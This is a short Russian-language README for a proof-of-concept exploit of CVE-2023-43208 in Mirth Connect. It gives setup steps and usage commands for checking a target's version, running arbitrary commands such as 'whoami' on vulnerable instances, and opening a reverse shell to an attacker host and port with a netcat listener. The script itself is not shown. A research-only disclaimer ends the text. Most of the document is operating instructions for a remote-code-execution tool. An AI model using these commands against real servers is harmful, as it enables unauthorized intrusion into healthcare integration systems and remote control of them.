
Python-скрипт для подтверждения концепции, демонстрирующий CVE‑2023‑43208 в Mirth Connect, позволяющий проверять версии и выполнять команды на уязвимых экземплярах.
# Создаем чистое виртуальное окружение
python3 -m venv .venv
source .venv/bin/activate
# Устанавливаем зафиксированные зависимости
pip install -r requirements.txt
# Только проверка версии
python3 CVE-2023-43208.py -u https://TARGET/ --check
# Выполнение одной команды
python3 CVE-2023-43208.py -u https://TARGET/ -c "whoami"
# Обратная оболочка (сначала запустите nc слушатель)
python3 CVE-2023-43208.py -u https://TARGET/ -l LHOST -p LPORT
Эта proof‑of‑concept предоставляется только для исследовательских и образовательных целей. Не используйте ее против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим кодом.